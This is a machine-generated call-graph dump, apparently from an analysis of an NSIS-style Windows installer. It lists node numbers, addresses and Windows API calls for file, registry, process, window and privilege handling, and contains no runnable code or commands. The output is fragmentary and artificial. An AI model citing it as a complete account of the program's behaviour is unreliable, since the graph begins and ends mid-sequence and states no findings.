SetFilePointer 5455->5456 5457 405e7a SetFilePointer 5455->5457 5455->5458 5456->5458 5457->5456 5459 405e85 5457->5459 5458->5447 5460 405e0a WriteFile 5459->5460 5460->5458 5461->5441 5462 401e66 5463 402bbf 18 API calls 5462->5463 5464 401e6c 5463->5464 5465 4052e2 25 API calls 5464->5465 5466 401e76 5465->5466 5467 405863 2 API calls 5466->5467 5468 401e7c 5467->5468 5469 401edb CloseHandle 5468->5469 5470 401e8c WaitForSingleObject 5468->5470 5472 40281e 5468->5472 5469->5472 5471 401e9e 5470->5471 5473 401eb0 GetExitCodeProcess 5471->5473 5474 406595 2 API calls 5471->5474 5475 401ec2 5473->5475 5476 401ecd 5473->5476 5477 401ea5 WaitForSingleObject 5474->5477 5479 4060ca wsprintfW 5475->5479 5476->5469 5477->5471 5479->5476 4354 401767 4355 402bbf 18 API calls 4354->4355 4356 40176e 4355->4356 4357 401796 4356->4357 4358 40178e 4356->4358 4412 406183 lstrcpynW 4357->4412 4411 406183 lstrcpynW 4358->4411 4361 401794 4365 406417 5 API calls 4361->4365 4362 4017a1 4413 405b37 lstrlenW CharPrevW 4362->4413 4369 4017b3 4365->4369 4370 4017c5 CompareFileTime 4369->4370 4371 401885 4369->4371 4379 4061a5 18 API calls 4369->4379 4383 406183 lstrcpynW 4369->4383 4389 40185c 4369->4389 4392 405d33 GetFileAttributesW 4369->4392 4395 405d58 GetFileAttributesW CreateFileW 4369->4395 4416 4064c6 FindFirstFileW 4369->4416 4419 4058c8 4369->4419 4370->4369 4372 4052e2 25 API calls 4371->4372 4374 40188f 4372->4374 4373 4052e2 25 API calls 4391 401871 4373->4391 4396 4030e7 4374->4396 4377 4018b6 SetFileTime 4378 4018c8 CloseHandle 4377->4378 4380 4018d9 4378->4380 4378->4391 4379->4369 4381 4018f1 4380->4381 4382 4018de 4380->4382 4385 4061a5 18 API calls 4381->4385 4384 4061a5 18 API calls 4382->4384 4383->4369 4386 4018e6 lstrcatW 4384->4386 4387 4018f9 4385->4387 4386->4387 4390 4058c8 MessageBoxIndirectW 4387->4390 4389->4373 4389->4391 4390->4391 4393 405d52 4392->4393 4394 405d45 SetFileAttributesW 4392->4394 4393->4369 4394->4393 4395->4369 4397 403112 4396->4397 4398 4030f6 SetFilePointer 4396->4398 4423 4031ef GetTickCount 4397->4423 4398->4397 4403 4031ef 43 API calls 4404 403149 4403->4404 4405 4031b5 ReadFile 4404->4405 4407 4018a2 4404->4407 4409 403158 4404->4409 4405->4407 4407->4377 4407->4378 4408 405ddb ReadFile 4408->4409 4409->4407 4409->4408 4438 405e0a WriteFile 4409->4438 4411->4361 4412->4362 4414 405b53 lstrcatW 4413->4414 4415 4017a7 lstrcatW 4413->4415 4414->4415 4415->4361 4417 4064e7 4416->4417 4418 4064dc FindClose 4416->4418 4417->4369 4418->4417 4420 4058dd 4419->4420 4421 405929 4420->4421 4422 4058f1 MessageBoxIndirectW 4420->4422 4421->4369 4422->4421 4424 403347 4423->4424 4425 40321d 4423->4425 4426 402d9f 33 API calls 4424->4426 4440 40336e SetFilePointer 4425->4440 4432 403119 4426->4432 4428 403228 SetFilePointer 4434 40324d 4428->4434 4432->4407 4436 405ddb ReadFile 4432->4436 4433 405e0a WriteFile 4433->4434 4434->4432 4434->4433 4435 403328 SetFilePointer 4434->4435 4441 403358 4434->4441 4444 406698 4434->4444 4451 402d9f 4434->4451 4435->4424 4437 403132 4436->4437 4437->4403 4437->4407 4439 405e28 4438->4439 4439->4409 4440->4428 4442 405ddb ReadFile 4441->4442 4443 40336b 4442->4443 4443->4434 4445 4066bd 4444->4445 4446 4066c5 4444->4446 4445->4434 4446->4445 4447 406755 GlobalAlloc 4446->4447 4448 40674c GlobalFree 4446->4448 4449 4067c3 GlobalFree 4446->4449 4450 4067cc GlobalAlloc 4446->4450 4447->4445 4447->4446 4448->4447 4449->4450 4450->4445 4450->4446 4452 402db0 4451->4452 4453 402dc8 4451->4453 4454 402db9 DestroyWindow 4452->4454 4460 402dc0 4452->4460 4455 402dd0 4453->4455 4456 402dd8 GetTickCount 4453->4456 4454->4460 4466 406595 4455->4466 4457 402de6 4456->4457 4456->4460 4459 402e1b CreateDialogParamW ShowWindow 4457->4459 4461 402dee 4457->4461 4459->4460 4460->4434 4461->4460 4470 402d83 4461->4470 4463 402dfc wsprintfW 4464 4052e2 25 API calls 4463->4464 4465 402e19 4464->4465 4465->4460 4467 4065b2 PeekMessageW 4466->4467 4468 4065c2 4467->4468 4469 4065a8 DispatchMessageW 4467->4469 4468->4460 4469->4467 4471 402d92 4470->4471 4472 402d94 MulDiv 4470->4472 4471->4472 4472->4463 5487 401ee9 5488 402bbf 18 API calls 5487->5488 5489 401ef0 5488->5489 5490 4064c6 2 API calls 5489->5490 5491 401ef6 5490->5491 5493 401f07 5491->5493 5494 4060ca wsprintfW 5491->5494 5494->5493 5495 100018a9 5496 100018cc 5495->5496 5497 100018ff GlobalFree 5496->5497 5498 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5496->5498 5497->5498 5499 10001272 2 API calls 5498->5499 5500 10001a87 GlobalFree GlobalFree 5499->5500 5501 4021ea 5502 402bbf 18 API calls 5501->5502 5503 4021f0 5502->5503 5504 402bbf 18 API calls 5503->5504 5505 4021f9 5504->5505 5506 402bbf 18 API calls 5505->5506 5507 402202 5506->5507 5508 4064c6 2 API calls 5507->5508 5509 40220b 5508->5509 5510 40221c lstrlenW lstrlenW 5509->5510 5515 40220f 5509->5515 5512 4052e2 25 API calls 5510->5512 5511 4052e2 25 API calls 5514 402217 5511->5514 5513 40225a SHFileOperationW 5512->5513 5513->5514 5513->5515 5515->5511 5515->5514 5516 40156b 5517 401584 5516->5517 5518 40157b ShowWindow 5516->5518 5519 401592 ShowWindow 5517->5519 5520 402a4c 5517->5520 5518->5517 5519->5520 5521 40226e 5522 402275 5521->5522 5526 402288 5521->5526 5523 4061a5 18 API calls 5522->5523 5524 402282 5523->5524 5525 4058c8 MessageBoxIndirectW 5524->5525 5525->5526 4504 403d6f 4505 403ec2 4504->4505 4506 403d87 4504->4506 4508 403ed3 GetDlgItem GetDlgItem 4505->4508 4523 403f13 4505->4523 4506->4505 4507 403d93 4506->4507 4510 403db1 4507->4510 4511 403d9e SetWindowPos 4507->4511 4509 404247 19 API calls 4508->4509 4514 403efd SetClassLongW 4509->4514 4512 403db6 ShowWindow 4510->4512 4513 403dce 4510->4513 4511->4510 4512->4513 4517 403df0 4513->4517 4518 403dd6 DestroyWindow 4513->4518 4519 40140b 2 API calls 4514->4519 4515 403f6d 4516 404293 SendMessageW 4515->4516 4521 403ebd 4515->4521 4542 403f7f 4516->4542 4524 403df5 SetWindowLongW 4517->4524 4525 403e06 4517->4525 4522 4041d0 4518->4522 4519->4523 4520 401389 2 API calls 4526 403f45 4520->4526 4522->4521 4535 404201 ShowWindow 4522->4535 4523->4515 4523->4520 4524->4521 4528 403e12 GetDlgItem 4525->4528 4529 403eaf 4525->4529 4526->4515 4530 403f49 SendMessageW 4526->4530 4527 4041d2 DestroyWindow EndDialog 4527->4522 4532 403e42 4528->4532 4533 403e25 SendMessageW IsWindowEnabled 4528->4533 4534 4042ae 8 API calls 4529->4534 4530->4521 4531 40140b 2 API calls 4531->4542 4537 403e4f 4532->4537 4539 403e96 SendMessageW 4532->4539 4540 403e62 4532->4540 4548 403e47 4532->4548 4533->4521 4533->4532 4534->4521 4535->4521 4536 4061a5 18 API calls 4536->4542 4537->4539 4537->4548 4538 404220 SendMessageW 4541 403e7d 4538->4541 4539->4529 4543 403e6a 4540->4543 4544 403e7f 4540->4544 4541->4529 4542->4521 4542->4527 4542->4531 4542->4536 4546 404247 19 API calls 4542->4546 4550 404247 19 API calls 4542->4550 4565 404112 DestroyWindow 4542->4565 4577 40140b 4543->4577 4547 40140b 2 API calls 4544->4547 4546->4542 4549 403e86 4547->4549 4548->4538 4549->4529 4549->4548 4551 403ffa GetDlgItem 4550->4551 4552 404017 ShowWindow KiUserCallbackDispatcher 4551->4552 4553 40400f 4551->4553 4574 404269 KiUserCallbackDispatcher 4552->4574 4553->4552 4555 404041 EnableWindow 4558 404055 4555->4558 4556 40405a GetSystemMenu EnableMenuItem SendMessageW 4557 40408a SendMessageW 4556->4557 4556->4558 4557->4558 4558->4556 4575 40427c SendMessageW 4558->4575 4576 406183 lstrcpynW 4558->4576 4561 4040b8 lstrlenW 4562 4061a5 18 API calls 4561->4562 4563 4040ce SetWindowTextW 4562->4563 4564 401389 2 API calls 4563->4564 4564->4542 4565->4522 4566 40412c CreateDialogParamW 4565->4566 4566->4522 4567 40415f 4566->4567 4568 404247 19 API calls 4567->4568 4569 40416a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4568->4569 4570 401389 2 API calls 4569->4570 4571 4041b0 4570->4571 4571->4521 4572 4041b8 ShowWindow 4571->4572 4573 404293 SendMessageW 4572->4573 4573->4522 4574->4555 4575->4558 4576->4561 4578 401389 2 API calls 4577->4578 4579 401420 4578->4579 4579->4548 5527 4014f1 SetForegroundWindow 5528 402a4c 5527->5528 5529 401673 5530 402bbf 18 API calls 5529->5530 5531 40167a 5530->5531 5532 402bbf 18 API calls 5531->5532 5533 401683 5532->5533 5534 402bbf 18 API calls 5533->5534 5535 40168c MoveFileW 5534->5535 5536 401698 5535->5536 5537 40169f 5535->5537 5538 401423 25 API calls 5536->5538 5539 4064c6 2 API calls 5537->5539 5541 4021e1 5537->5541 5538->5541 5540 4016ae 5539->5540 5540->5541 5542 406024 38 API calls 5540->5542 5542->5536 5543 100016b6 5544 100016e5 5543->5544 5545 10001b18 22 API calls 5544->5545 5546 100016ec 5545->5546 5547 100016f3 5546->5547 5548 100016ff 5546->5548 5549 10001272 2 API calls 5547->5549 5550 10001726 5548->5550 5551 10001709 5548->5551 5552 100016fd 5549->5552 5554 10001750 5550->5554 5555 1000172c 5550->5555 5553 1000153d 3 API calls 5551->5553 5557 1000170e 5553->5557 5556 1000153d 3 API calls 5554->5556 5558 100015b4 3 API calls 5555->5558 5556->5552 5560 100015b4 3 API calls 5557->5560 5559 10001731 5558->5559 5561 10001272 2 API calls 5559->5561 5562 10001714 5560->5562 5563 10001737 GlobalFree 5561->5563 5564 10001272 2 API calls 5562->5564 5563->5552 5565 1000174b GlobalFree 5563->5565 5566 1000171a GlobalFree 5564->5566 5565->5552 5566->5552 5567 10002238 5568 10002296 5567->5568 5569 100022cc 5567->5569 5568->5569 5570 100022a8 GlobalAlloc 5568->5570 5570->5568 5571 401cfa GetDlgItem GetClientRect 5572 402bbf 18 API calls 5571->5572 5573 401d2c LoadImageW SendMessageW 5572->5573 5574 401d4a DeleteObject 5573->5574 5575 402a4c 5573->5575 5574->5575 5007 40237b 5008 402381 5007->5008 5009 402bbf 18 API calls 5008->5009 5010 402393 5009->5010 5011 402bbf 18 API calls 5010->5011 5012 40239d RegCreateKeyExW 5011->5012 5013 4023c7 5012->5013 5014 40281e 5012->5014 5015 4023e2 5013->5015 5016 402bbf 18 API calls 5013->5016 5017 4023ee 5015->5017 5020 402ba2 18 API calls 5015->5020 5019 4023d8 lstrlenW 5016->5019 5018 402409 RegSetValueExW 5017->5018 5021 4030e7 45 API calls 5017->5021 5022 40241f RegCloseKey 5018->5022 5019->5015 5020->5017 5021->5018 5022->5014 5576 4027fb 5577 402bbf 18 API calls 5576->5577 5578 402802 FindFirstFileW 5577->5578 5579 40282a 5578->5579 5582 402815 5578->5582 5580 402833 5579->5580 5584 4060ca wsprintfW 5579->5584 5585 406183 lstrcpynW 5580->5585 5584->5580 5585->5582 5600 1000103d 5601 1000101b 5 API calls 5600->5601 5602 10001056 5601->5602 5603 4014ff 5604 401507 5603->5604 5606 40151a 5603->5606 5605 402ba2 18 API calls 5604->5605 5605->5606 5607 401000 5608 401037 BeginPaint GetClientRect 5607->5608 5609 40100c DefWindowProcW 5607->5609 5611 4010f3 5608->5611 5612 401179 5609->5612 5613 401073 CreateBrushIndirect FillRect DeleteObject 5611->5613 5614 4010fc 5611->5614 5613->5611 5615 401102 CreateFontIndirectW 5614->5615 5616 401167 EndPaint 5614->5616 5615->5616 5617 401112 6 API calls 5615->5617 5616->5612 5617->5616 5625 401904 5626 40193b 5625->5626 5627 402bbf 18 API calls 5626->5627 5628 401940 5627->5628 5629 405974 69 API calls 5628->5629 5630 401949 5629->5630 5631 402d04 5632 402d16 SetTimer 5631->5632 5633 402d2f 5631->5633 5632->5633 5634 402d7d 5633->5634 5635 402d83 MulDiv 5633->5635 5636 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 5635->5636 5636->5634 5638 402786 5639 40278d 5638->5639 5641 4029f7 5638->5641 5640 402ba2 18 API calls 5639->5640 5642 402798 5640->5642 5643 40279f SetFilePointer 5642->5643 5643->5641 5644 4027af 5643->5644 5646 4060ca wsprintfW 5644->5646 5646->5641 4473 100027c7 4474 10002817 4473->4474 4475 100027d7 VirtualProtect 4473->4475 4475->4474 5647 401907 5648 402bbf 18 API calls 5647->5648 5649 40190e 5648->5649 5650 4058c8 MessageBoxIndirectW 5649->5650 5651 401917 5650->5651 4476 401e08 4477 402bbf 18 API calls 4476->4477 4478 401e0e 4477->4478 4479 402bbf 18 API calls 4478->4479 4480 401e17 4479->4480 4481 402bbf 18 API calls 4480->4481 4482 401e20 4481->4482 4483 402bbf 18 API calls 4482->4483 4484 401e29 4483->4484 4485 401423 25 API calls 4484->4485 4486 401e30 ShellExecuteW 4485->4486 4487 401e61 4486->4487 5657 40398a 5658 403995 5657->5658 5659 40399c GlobalAlloc 5658->5659 5660 403999 5658->5660 5659->5660 5661 1000164f 5662 10001516 GlobalFree 5661->5662 5664 10001667 5662->5664 5663 100016ad GlobalFree 5664->5663 5665 10001682 5664->5665 5666 10001699 VirtualFree 5664->5666 5665->5663 5666->5663 5667 401491 5668 4052e2 25 API calls 5667->5668 5669 401498 5668->5669 5677 401a15 5678 402bbf 18 API calls 5677->5678 5679 401a1e ExpandEnvironmentStringsW 5678->5679 5680 401a32 5679->5680 5682 401a45 5679->5682 5681 401a37 lstrcmpW 5680->5681 5680->5682 5681->5682 5683 402515 5684 402bbf 18 API calls 5683->5684 5685 40251c 5684->5685 5688 405d58 GetFileAttributesW CreateFileW 5685->5688 5687 402528 5688->5687 5689 402095 5690 402bbf 18 API calls 5689->5690 5691 40209c 5690->5691 5692 402bbf 18 API calls 5691->5692 5693 4020a6 5692->5693 5694 402bbf 18 API calls 5693->5694 5695 4020b0 5694->5695 5696 402bbf 18 API calls 5695->5696 5697 4020ba 5696->5697 5698 402bbf 18 API calls 5697->5698 5700 4020c4 5698->5700 5699 402103 CoCreateInstance 5704 402122 5699->5704 5700->5699 5701 402bbf 18 API calls 5700->5701 5701->5699 5702 401423 25 API calls 5703 4021e1 5702->5703 5704->5702 5704->5703 5705 404395 lstrlenW 5706 4043b4 5705->5706 5707 4043b6 WideCharToMultiByte 5705->5707 5706->5707 5708 401b16 5709 402bbf 18 API calls 5708->5709 5710 401b1d 5709->5710 5711 402ba2 18 API calls 5710->5711 5712 401b26 wsprintfW 5711->5712 5713 402a4c 5712->5713 5714 10001058 5715 10001074 5714->5715 5716 100010dd 5715->5716 5717 10001516 GlobalFree 5715->5717 5718 10001092 5715->5718 5717->5718 5719 10001516 GlobalFree 5718->5719 5720 100010a2 5719->5720 5721 100010b2 5720->5721 5722 100010a9 GlobalSize 5720->5722 5723 100010b6 GlobalAlloc 5721->5723 5724 100010c7 5721->5724 5722->5721 5725 1000153d 3 API calls 5723->5725 5726 100010d2 GlobalFree 5724->5726 5725->5724 5726->5716 5024 40159b 5025 402bbf 18 API calls 5024->5025 5026 4015a2 SetFileAttributesW 5025->5026 5027 4015b4 5026->5027 5727 40469b 5728 4046d1 5727->5728 5729 4046ab 5727->5729 5731 4042ae 8 API calls 5728->5731 5730 404247 19 API calls 5729->5730 5732 4046b8 SetDlgItemTextW 5730->5732 5733 4046dd 5731->5733 5732->5728 5734 401f1d 5735 402bbf 18 API calls 5734->5735 5736 401f24 5735->5736 5737 406559 5 API calls 5736->5737 5738 401f33 5737->5738 5739 401f4f GlobalAlloc 5738->5739 5741 401fb7 5738->5741 5740 401f63 5739->5740 5739->5741 5742 406559 5 API calls 5740->5742 5743 401f6a 5742->5743 5744 406559 5 API calls 5743->5744 5745 401f74 5744->5745 5745->5741 5749 4060ca wsprintfW 5745->5749 5747 401fa9 5750 4060ca wsprintfW 5747->5750 5749->5747 5750->5741 5751 40229d 5752 4022a5 5751->5752 5753 4022ab 5751->5753 5754 402bbf 18 API calls 5752->5754 5755 4022b9 5753->5755 5757 402bbf 18 API calls 5753->5757 5754->5753 5756 4022c7 5755->5756 5758 402bbf 18 API calls 5755->5758 5759 402bbf 18 API calls 5756->5759 5757->5755 5758->5756 5760 4022d0 WritePrivateProfileStringW 5759->5760 5036 40249e 5037 402cc9 19 API calls 5036->5037 5038 4024a8 5037->5038 5039 402ba2 18 API calls 5038->5039 5040 4024b1 5039->5040 5041 4024bc 5040->5041 5045 40281e 5040->5045 5042 4024d5 RegEnumValueW 5041->5042 5043 4024c9 RegEnumKeyW 5041->5043 5044 4024ee RegCloseKey 5042->5044 5042->5045 5043->5044 5044->5045 5761 40149e 5762 402288 5761->5762 5763 4014ac PostQuitMessage 5761->5763 5763->5762 5047 40231f 5048 402324 5047->5048 5049 40234f 5047->5049 5050 402cc9 19 API calls 5048->5050 5051 402bbf 18 API calls 5049->5051 5052 40232b 5050->5052 5053 402356 5051->5053 5054 402335 5052->5054 5058 40236c 5052->5058 5059 402bff RegOpenKeyExW 5053->5059 5055 402bbf 18 API calls 5054->5055 5056 40233c RegDeleteValueW RegCloseKey 5055->5056 5056->5058 5060 402c93 5059->5060 5063 402c2a 5059->5063 5060->5058 5061 402c50 RegEnumKeyW 5062 402c62 RegCloseKey 5061->5062 5061->5063 5065 406559 5 API calls 5062->5065 5063->5061 5063->5062 5064 402c87 RegCloseKey 5063->5064 5066 402bff 5 API calls 5063->5066 5068 402c76 5064->5068 5067 402c72 5065->5067 5066->5063 5067->5068 5069 402ca2 RegDeleteKeyW 5067->5069 5068->5060 5069->5068 4029 405421 4030 405442 GetDlgItem GetDlgItem GetDlgItem 4029->4030 4031 4055cb 4029->4031 4075 40427c SendMessageW 4030->4075 4032 4055d4 GetDlgItem CreateThread CloseHandle 4031->4032 4033 4055fc 4031->4033 4032->4033 4148 4053b5 OleInitialize 4032->4148 4035 405627 4033->4035 4037 405613 ShowWindow ShowWindow 4033->4037 4038 40564c 4033->4038 4039 405633 4035->4039 4040 405687 4035->4040 4036 4054b2 4041 4054b9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4036->4041 4080 40427c SendMessageW 4037->4080 4084 4042ae 4038->4084 4043 405661 ShowWindow 4039->4043 4044 40563b 4039->4044 4040->4038 4048 405695 SendMessageW 4040->4048 4046 405527 4041->4046 4047 40550b SendMessageW SendMessageW 4041->4047 4051 405681 4043->4051 4052 405673 4043->4052 4081 404220 4044->4081 4054 40553a 4046->4054 4055 40552c SendMessageW 4046->4055 4047->4046 4050 40565a 4048->4050 4056 4056ae CreatePopupMenu 4048->4056 4053 404220 SendMessageW 4051->4053 4098 4052e2 4052->4098 4053->4040 4076 404247 4054->4076 4055->4054 4109 4061a5 4056->4109 4061 40554a 4064 405553 ShowWindow 4061->4064 4065 405587 GetDlgItem SendMessageW 4061->4065 4062 4056db GetWindowRect 4063 4056ee TrackPopupMenu 4062->4063 4063->4050 4066 405709 4063->4066 4067 405576 4064->4067 4068 405569 ShowWindow 4064->4068 4065->4050 4069 4055ae SendMessageW SendMessageW 4065->4069 4070 405725 SendMessageW 4066->4070 4079 40427c SendMessageW 4067->4079 4068->4067 4069->4050 4070->4070 4071 405742 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4070->4071 4073 405767 SendMessageW 4071->4073 4073->4073 4074 405790 GlobalUnlock SetClipboardData CloseClipboard 4073->4074 4074->4050 4075->4036 4077 4061a5 18 API calls 4076->4077 4078 404252 SetDlgItemTextW 4077->4078 4078->4061 4079->4065 4080->4035 4082 404227 4081->4082 4083 40422d SendMessageW 4081->4083 4082->4083 4083->4038 4085 4042c6 GetWindowLongW 4084->4085 4095 40434f 4084->4095 4086 4042d7 4085->4086 4085->4095 4087 4042e6 GetSysColor 4086->4087 4088 4042e9 4086->4088 4087->4088 4089 4042f9 SetBkMode 4088->4089 4090 4042ef SetTextColor 4088->4090 4091 404311 GetSysColor 4089->4091 4092 404317 4089->4092 4090->4089 4091->4092 4093 40431e SetBkColor 4092->4093 4094 404328 4092->4094 4093->4094 4094->4095 4096 404342 CreateBrushIndirect 4094->4096 4097 40433b DeleteObject 4094->4097 4095->4050 4096->4095 4097->4096 4099 4052fd 4098->4099 4100 40539f 4098->4100 4101 405319 lstrlenW 4099->4101 4102 4061a5 18 API calls 4099->4102 4100->4051 4103 405342 4101->4103 4104 405327 lstrlenW 4101->4104 4102->4101 4106 405355 4103->4106 4107 405348 SetWindowTextW 4103->4107 4104->4100 4105 405339 lstrcatW 4104->4105 4105->4103 4106->4100 4108 40535b SendMessageW SendMessageW SendMessageW 4106->4108 4107->4106 4108->4100 4114 4061b2 4109->4114 4110 4063fd 4111 4056be AppendMenuW 4110->4111 4143 406183 lstrcpynW 4110->4143 4111->4062 4111->4063 4113 406265 GetVersion 4113->4114 4114->4110 4114->4113 4115 4063cb lstrlenW 4114->4115 4118 4061a5 10 API calls 4114->4118 4120 4062e0 GetSystemDirectoryW 4114->4120 4121 4062f3 GetWindowsDirectoryW 4114->4121 4123 406327 SHGetSpecialFolderLocation 4114->4123 4124 4061a5 10 API calls 4114->4124 4125 40636c lstrcatW 4114->4125 4127 406050 RegOpenKeyExW 4114->4127 4132 406417 4114->4132 4141 4060ca wsprintfW 4114->4141 4142 406183 lstrcpynW 4114->4142 4115->4114 4118->4115 4120->4114 4121->4114 4123->4114 4126 40633f SHGetPathFromIDListW CoTaskMemFree 4123->4126 4124->4114 4125->4114 4126->4114 4128 4060c4 4127->4128 4129 406084 RegQueryValueExW 4127->4129 4128->4114 4131 4060a5 RegCloseKey 4129->4131 4131->4128 4138 406424 4132->4138 4133 40649a 4134 40649f CharPrevW 4133->4134 4137 4064c0 4133->4137 4134->4133 4135 40648d CharNextW 4135->4133 4135->4138 4137->4114 4138->4133 4138->4135 4139 406479 CharNextW 4138->4139 4140 406488 CharNextW 4138->4140 4144 405b64 4138->4144 4139->4138 4140->4135 4141->4114 4142->4114 4143->4111 4145 405b6a 4144->4145 4146 405b80 4145->4146 4147 405b71 CharNextW 4145->4147 4146->4138 4147->4145 4155 404293 4148->4155 4150 404293 SendMessageW 4152 405411 OleUninitialize 4150->4152 4151 4053d8 4154 4053ff 4151->4154 4158 401389 4151->4158 4154->4150 4156 4042ab 4155->4156 4157 40429c SendMessageW 4155->4157 4156->4151 4157->4156 4160 401390 4158->4160 4159 4013fe 4159->4151 4160->4159 4161 4013cb MulDiv SendMessageW 4160->4161 4161->4160 5764 100010e1 5773 10001111 5764->5773 5765 100011d8 GlobalFree 5766 100012ba 2 API calls 5766->5773 5767 100011d3 5767->5765 5768 100011f8 GlobalFree 5768->5773 5769 10001272 2 API calls 5772 100011c4 GlobalFree 5769->5772 5770 10001164 GlobalAlloc 5770->5773 5771 100012e1 lstrcpyW 5771->5773 5772->5773 5773->5765 5773->5766 5773->5767 5773->5768 5773->5769 5773->5770 5773->5771 5773->5772 5774 401ca3 5775 402ba2 18 API calls 5774->5775 5776 401ca9 IsWindow 5775->5776 5777 401a05 5776->5777 5778 402a27 SendMessageW 5779 402a41 InvalidateRect 5778->5779 5780 402a4c 5778->5780 5779->5780 4488 40242a 4499 402cc9 4488->4499 4490 402434 4491 402bbf 18 API calls 4490->4491 4492 40243d 4491->4492 4493 402448 RegQueryValueExW 4492->4493 4495 40281e 4492->4495 4494 402468 4493->4494 4496 40246e RegCloseKey 4493->4496 4494->4496 4503 4060ca wsprintfW 4494->4503 4496->4495 4500 402bbf 18 API calls 4499->4500 4501 402ce2 4500->4501 4502 402cf0 RegOpenKeyExW 4501->4502 4502->4490 4503->4496 5788 40172d 5789 402bbf 18 API calls 5788->5789 5790 401734 SearchPathW 5789->5790 5791 40174f 5790->5791 5792 4027b4 5793 4027ba 5792->5793 5794 4027c2 FindClose 5793->5794 5795 402a4c 5793->5795 5794->5795 4590 4033b6 SetErrorMode GetVersion 4591 4033ea 4590->4591 4592 4033f0 4590->4592 4594 406559 5 API calls 4591->4594 4681 4064ed GetSystemDirectoryW 4592->4681 4594->4592 4595 403407 4596 4064ed 3 API calls 4595->4596 4597 403411 4596->4597 4598 4064ed 3 API calls 4597->4598 4599 40341b 4598->4599 4684 406559 GetModuleHandleA 4599->4684 4602 406559 5 API calls 4603 403429 #17 OleInitialize SHGetFileInfoW 4602->4603 4690 406183 lstrcpynW 4603->4690 4605 403466 GetCommandLineW 4691 406183 lstrcpynW 4605->4691 4607 403478 GetModuleHandleW 4608 403490 4607->4608 4609 405b64 CharNextW 4608->4609 4610 40349f CharNextW 4609->4610 4611 4035ca GetTempPathW 4610->4611 4618 4034b8 4610->4618 4692 403385 4611->4692 4613 4035e2 4614 4035e6 GetWindowsDirectoryW lstrcatW 4613->4614 4615 40363c DeleteFileW 4613->4615 4619 403385 12 API calls 4614->4619 4702 402e41 GetTickCount GetModuleFileNameW 4615->4702 4616 405b64 CharNextW 4616->4618 4618->4616 4624 4035b5 4618->4624 4625 4035b3 4618->4625 4620 403602 4619->4620 4620->4615 4622 403606 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4620->4622 4621 403650 4626 4036f3 4621->4626 4630 405b64 CharNextW 4621->4630 4676 403703 4621->4676 4623 403385 12 API calls 4622->4623 4628 403634 4623->4628 4788 406183 lstrcpynW 4624->4788 4625->4611 4732 4039cc 4626->4732 4628->4615 4628->4676 4647 40366f 4630->4647 4633 40383e 4636 4038c2 ExitProcess 4633->4636 4637 403846 GetCurrentProcess OpenProcessToken 4633->4637 4634 40371e 4635 4058c8 MessageBoxIndirectW 4634->4635 4639 40372c ExitProcess 4635->4639 4642 403892 4637->4642 4643 40385e LookupPrivilegeValueW AdjustTokenPrivileges 4637->4643 4640 403734 4814 40584b 4640->4814 4641 4036cd 4789 405c3f 4641->4789 4646 406559 5 API calls 4642->4646 4643->4642 4650 403899 4646->4650 4647->4640 4647->4641 4653 4038ae ExitWindowsEx 4650->4653 4656 4038bb 4650->4656 4651 403755 lstrcatW lstrcmpiW 4655 403771 4651->4655 4651->4676 4652 40374a lstrcatW 4652->4651 4653->4636 4653->4656 4658 403776 4655->4658 4659 40377d 4655->4659 4660 40140b 2 API calls 4656->4660 4657 4036e8 4804 406183 lstrcpynW 4657->4804 4817 4057b1 CreateDirectoryW 4658->4817 4822 40582e CreateDirectoryW 4659->4822 4660->4636 4665 403782 SetCurrentDirectoryW 4666 403792 4665->4666 4667 40379d 4665->4667 4825 406183 lstrcpynW 4666->4825 4826 406183 lstrcpynW 4667->4826 4670 4061a5 18 API calls 4671 4037dc DeleteFileW 4670->4671 4672 4037e9 CopyFileW 4671->4672 4677 4037ab 4671->4677 4672->4677 4673 403832 4674 406024 38 API calls 4673->4674 4674->4676 4805 4038da 4676->4805 4677->4670 4677->4673 4678 4061a5 18 API calls 4677->4678 4680 40381d CloseHandle 4677->4680 4827 406024 MoveFileExW 4677->4827 4831 405863 CreateProcessW 4677->4831 4678->4677 4680->4677 4682 40650f wsprintfW LoadLibraryW 4681->4682 4682->4595 4685 406575 4684->4685 4686 40657f GetProcAddress 4684->4686 4687 4064ed 3 API calls 4685->4687 4688 403422 4686->4688 4689 40657b 4687->4689 4688->4602 4689->4686 4689->4688 4690->4605 4691->4607 4693 406417 5 API calls 4692->4693 4695 403391 4693->4695 4694 40339b 4694->4613 4695->4694 4696 405b37 3 API calls 4695->4696 4697 4033a3 4696->4697 4698 40582e 2 API calls 4697->4698 4699 4033a9 4698->4699 4700 405d87 2 API calls 4699->4700 4701 4033b4 4700->4701 4701->4613 4834 405d58 GetFileAttributesW CreateFileW 4702->4834 4704 402e84 4731 402e91 4704->4731 4835 406183 lstrcpynW 4704->4835 4706 402ea7 4836 405b83 lstrlenW 4706->4836 4710 402eb8 GetFileSize 4711 402fb9 4710->4711 4730 402ecf 4710->4730 4712 402d9f 33 API calls 4711->4712 4714 402fc0 4712->4714 4713 403358 ReadFile 4713->4730 4715 402ffc GlobalAlloc 4714->4715 4714->4731 4842 40336e SetFilePointer 4714->4842 4718 403013 4715->4718 4716 403054 4719 402d9f 33 API calls 4716->4719 4723 405d87 2 API calls 4718->4723 4719->4731 4720 402fdd 4721 403358 ReadFile 4720->4721 4724 402fe8 4721->4724 4722 402d9f 33 API calls 4722->4730 4725 403024 CreateFileW 4723->4725 4724->4715 4724->4731 4726 40305e 4725->4726 4725->4731 4841 40336e SetFilePointer 4726->4841 4728 40306c 4729 4030e7 45 API calls 4728->4729 4729->4731 4730->4711 4730->4713 4730->4716 4730->4722 4730->4731 4731->4621 4733 406559 5 API calls 4732->4733 4734 4039e0 4733->4734 4735 4039e6 4734->4735 4736 4039f8 4734->4736 4852 4060ca wsprintfW 4735->4852 4737 406050 3 API calls 4736->4737 4738 403a28 4737->4738 4740 403a47 lstrcatW 4738->4740 4742 406050 3 API calls 4738->4742 4741 4039f6 4740->4741 4843 403ca2 4741->4843 4742->4740 4745 405c3f 18 API calls 4746 403a79 4745->4746 4747 403b0d 4746->4747 4749 406050 3 API calls 4746->4749 4748 405c3f 18 API calls 4747->4748 4750 403b13 4748->4750 4751 403aab 4749->4751 4752 403b23 LoadImageW 4750->4752 4753 4061a5 18 API calls 4750->4753 4751->4747 4756 403acc lstrlenW 4751->4756 